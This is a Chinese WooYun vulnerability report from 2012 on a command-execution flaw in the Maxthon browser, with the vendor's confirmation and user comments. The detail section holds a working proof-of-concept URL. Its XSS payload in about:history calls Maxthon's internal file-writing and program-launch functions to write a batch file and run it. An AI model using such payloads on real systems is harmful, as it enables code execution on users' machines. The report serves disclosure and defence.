当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-07599

漏洞标题:遨游浏览器命令执行漏洞

相关厂商:傲游

漏洞作者: icefish

提交时间:2012-05-28 12:47

修复时间:2012-07-12 12:48

公开时间:2012-07-12 12:48

漏洞类型:远程代码执行

危害等级:高

自评Rank:19

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-28: 细节已通知厂商并且等待厂商处理中
2012-05-28: 厂商已经确认,细节仅向厂商公开
2012-05-31: 细节向第三方安全合作伙伴开放
2012-07-22: 细节向核心白帽子及相关领域专家公开
2012-08-01: 细节向普通白帽子公开
2012-08-11: 细节向实习白帽子公开
2012-07-12: 细节向公众公开

简要描述:

首先这个漏洞不是我发现的,我只是给大家展示利用下,详细信息大家可以去看知道创宇安全研究团队的微博

详细说明:

这个漏洞首先是国外某个团队发现的,他研究了多个浏览器的漏洞。其中遨游的漏洞比较独特,大致存在几个方面的,
1.about:history中存在xss漏洞,即浏览历史中url链接中存在明显的xss漏洞。
2.遨游的拓展中存在大量敏感函数,其中包括了写文件(目前看只能写在C:\Documents and Settings\Administrator\Local Settings\Temp目录下),命令执行(执行你写入的文件),此外目测还有大量系统内部数据可以操作,比如下载,配置等等。
3.除了1所说的地方外,Rss订阅那里也有xss漏洞,我个人估计遨游自己的插件大部分地方可能都会存在xss漏洞
4.2中所提到的大量敏感函数都是在dom中,只能在域i.maxthon.com以及本地类似浏览历史,收藏夹这种地方被调用。
构造类似链接
http://www.baidu.com/1.html#\"><img src=a onerror='var b=maxthon.io.File.createTempFile("test","bat");c=maxthon.io.File(b);maxthon.io.FileWriter(b);maxthon.io.writeText("cmd /k calc.exe");alert(b.name_);maxthon.program.Program.launch(b.name_,"C:\\WINDOWS\\system32")'/>
在遨游中访问,
然后打开about:history,就可以看到效果了
那个pdf给的例子是构造了1.html的内容为
a=window.location.href='about:history';

漏洞证明:

修复方案:

ms遨游已经修复了直接打开about:history这个洞

版权声明:转载请注明来源 icefish@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-28 12:54

厂商回复:

感谢报告, 正在检查和处理中.

最新状态:

暂无


漏洞评价:

评论

  1. 2012-06-27 16:09 | Henry:bobo ( 普通白帽子 | Rank:104 漏洞数:22 | 本胖吊!~又高又肥2个奶奶像地雷)

    !!!!!!!给力

  2. 2012-07-12 15:19 | momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)

    这个可以有。遨游浏览器好像还不兼容搜狗输入法和QQ这3个一起使用。

  3. 2015-04-10 17:53 | M4ster ( 实习白帽子 | Rank:39 漏洞数:7 | www.m4ster@gmail.com)

    某个团队是哪个团队呢?